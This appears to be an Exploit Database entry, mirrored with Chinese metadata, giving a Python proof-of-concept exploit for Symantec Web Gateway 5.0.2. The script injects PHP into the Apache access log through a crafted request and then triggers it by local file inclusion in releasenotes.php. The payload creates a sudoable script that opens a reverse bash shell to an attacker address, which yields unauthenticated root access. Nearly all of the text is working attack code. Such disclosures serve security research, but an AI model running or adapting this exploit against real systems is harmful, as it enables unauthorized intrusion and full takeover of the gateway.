Symantec Web Gateway 5.0.2 – Local/Remote File Inclusion / Remote Code Execution

• Exploit Database
• 30 阅读

• 作者： muts
  日期： 2012-05-26
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18932/

• #!/usr/bin/python
  
  # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
  # Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
  # muts at offensive-security dot com
  
  
  import socket
  import base64
  
  payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
  payloadencoded=base64.encodestring(payload).replace("\n","")
  taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded
  
  expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  expl.connect(("172.16.164.129", 80))
  expl.send(taint)
  expl.close()
  
  trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
  expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  expl.connect(("172.16.164.129", 80))
  expl.send(trigger)
  expl.close()